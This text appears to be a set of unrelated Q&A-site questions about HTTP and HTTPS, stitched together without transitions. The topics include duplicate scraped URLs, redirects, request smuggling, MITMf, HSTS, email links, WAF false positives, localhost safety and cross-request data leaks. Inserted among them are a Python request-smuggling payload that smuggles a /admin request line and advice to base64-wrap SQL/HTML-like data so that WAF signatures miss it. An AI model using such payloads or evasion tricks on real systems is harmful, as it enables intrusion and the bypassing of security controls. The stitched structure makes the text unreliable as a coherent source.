When I use the Python package newspaper3k and run the code

    import newspaper

    paper = newspaper.build('http://abcnews.com', memoize_articles=False)
    for url in paper.article_urls():
        print(url)
I get a list of URLs for articles that I can download, and both of these URLs appear in the list.
As can be seen, the only difference between the two URLs is the s in https. The question is: can the webpage content differ simply because an s is added to http? If I scrape a news source (in this case http://abcnews.com), do I need to download both articles to be sure I don't miss any, or are they guaranteed to have the same content, so that I can download only one of them?
I have also noticed that some URLs are duplicated by adding www. after the protocol (https://). I have the same question here: can this small change cause the webpage content to differ, and is this something I should take into account, or can I simply ignore one of the two URLs?
What I need to do is redirect only some of the sites in my multisite installation to HTTP instead of HTTPS. Currently every site redirects to HTTPS, but I can't figure out how to force only some sites to go over HTTP. How would I achieve this?
I am currently trying to learn about the HTTP Request Smuggling vulnerability to further enhance my pen-testing skills. I have watched a couple of videos on YouTube and read articles online about it, but I still have a couple of questions in mind. Questions:
- What are the attack vectors of HTTP Request Smuggling (where should I look)?
- What is the main way to provide a PoC to companies with high traffic? I know that HTTP Request Smuggling could possibly steal people's cookies; can this be used for the PoC, or is that illegal?
- Can this or other vulnerabilities be chained together (e.g., self-XSS & CSRF)?
Thank you everyone!
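For reference, the variant most of those articles start with is the CL.TE desync, where the front-end honors Content-Length while the back-end honors Transfer-Encoding, so everything after the zero-length chunk is treated as the start of the next request. A sketch of such a raw request (the host and the smuggled request line are hypothetical, purely to show the shape):

```python
# CL.TE request smuggling payload (illustrative only; the host and
# the smuggled /admin request line are made-up examples).
body = (
    b"0\r\n"                          # zero-length chunk: back-end stops here
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"        # smuggled prefix seen by the back-end
    b"X-Ignore: "                     # swallows the start of the next request
)
request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    # Content-Length covers the whole body, so the front-end forwards it all.
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + body
```

The point of the sketch is the disagreement between the two length headers; where such requests can actually be sent, and how to demonstrate impact lawfully, is exactly what your questions above are about.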
The service starts fine and the request is recorded in the MITMf console, but the HTTP site is not loaded. Meanwhile, HTTPS sites load, but their requests are not recorded in the console.
Before the HSTS security policy was introduced, if a user didn't specify the protocol in the URL, were the initial requests sent over HTTP by default for every website?
I’m terrified of clicking on links in emails, and yet a colleague insists I do.
When I receive an email in my gmail account that contains links of the form
http://gofile.me/xxxxx/yyyyyyyyy along with its password, apparently sent from someone I know and expect it from, and who has supplied the password for the link to their NAS right next to it, should I try to overcome my fear of clicking on links in emails and consider clicking it at least fairly safe? Should I instead copy it and paste it into a new tab?
The idea is that the document is evolving so the link will provide the latest version, but should I insist the colleague email me the document directly?
tl;dr: Should I
- click url
- copy/paste url in new tab
- balk, request document be emailed each time
If possible, can an answer be written in simple language?
Cropped, blanked out screenshot from email I received in my gmail:
I'm working on securing an application that receives SQL- and HTML-like data that is actually proprietary formulas in some cases, and parts of XML documents in others.
So the WAF thinks some HTTP requests are SQL or HTML injection attacks while they actually aren’t.
So how can I send these formulas and this XML information without triggering those WAF rules? I tried encoding the data, but that didn't work.
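One common approach, sketched below under two assumptions (you control both the client and the server, and the WAF either ignores or can be configured to skip the wrapped field), is to transport the payload in a form the SQL/HTML signatures won't pattern-match, such as base64 inside a JSON field, and decode it server-side. The formula string here is a made-up example:

```python
import base64
import json

# Hypothetical proprietary formula that looks like SQL/HTML to a WAF.
formula = "SELECT_RANGE(A1:B2) WHERE <threshold>"

# Client side: wrap the payload so WAF signatures never see the raw text.
wire = json.dumps({"formula_b64": base64.b64encode(formula.encode()).decode()})

# Server side: unwrap before processing.
received = json.loads(wire)
decoded = base64.b64decode(received["formula_b64"]).decode()
assert decoded == formula
```

Note that some WAFs do decode base64, in which case you would still need a rule exception scoped to that one endpoint or field, rather than disabling the signatures globally.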
I use localhost to practice coding, and I keep coming back to the same question whenever I use Node.js:
Is it really safe?
Many, many people have probably asked this. I would naturally want to put SSL/HTTPS encryption on it, but there isn't really anywhere you can get a certificate for localhost, even if that may be a bit overkill.
It feels like there should be some "protection" or "encryption" type of package on npm or something.
I haven't used Node.js or localhost for sensitive information, but should I be worrying about this?
I checked established connections with the netstat command in Command Prompt, and I found some connections to Microsoft IPs (I checked the IPs online) that are established over HTTP (not HTTPS); they trace back to svchost.exe in a Win32 folder of the system. I know that HTTP connections are not safe, but I guess these are safe since they go to Microsoft IPs. Why are these connections not encrypted (HTTP)? Is that normal?
We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.
Although it is well known that web applications should be stateless, the long dependency graph of such an application makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible in a wide range of web frameworks and environments (e.g., Django, .NET, Node.js, AWS Lambda), since they all reuse the application between requests to avoid cold starts.
What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.
Are there tools and methods to test for such mistakes, or to detect them in production?
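For illustration, the bug described above reduces to a handler that memoizes per-user data in module-level state that outlives the request. All names here are hypothetical; the pattern, not any particular library's API, is the point:

```python
# Module-level state survives across requests because the worker
# process is reused between requests to avoid cold starts.
_cache = {}

def get_profile(user_id, fetch):
    """Buggy handler helper: the cache key is not scoped to the
    user, so data fetched for user A is served to user B."""
    if "profile" not in _cache:            # bug: key ignores user_id
        _cache["profile"] = fetch(user_id)
    return _cache["profile"]

# Request from user A populates the cache...
a = get_profile("alice", lambda uid: {"owner": uid})
# ...and the request from user B receives Alice's data.
b = get_profile("bob", lambda uid: {"owner": uid})
print(b["owner"])  # prints "alice", not "bob"
```

A regression test that replays the same endpoint as two different users and asserts the responses differ would catch exactly this class of mistake.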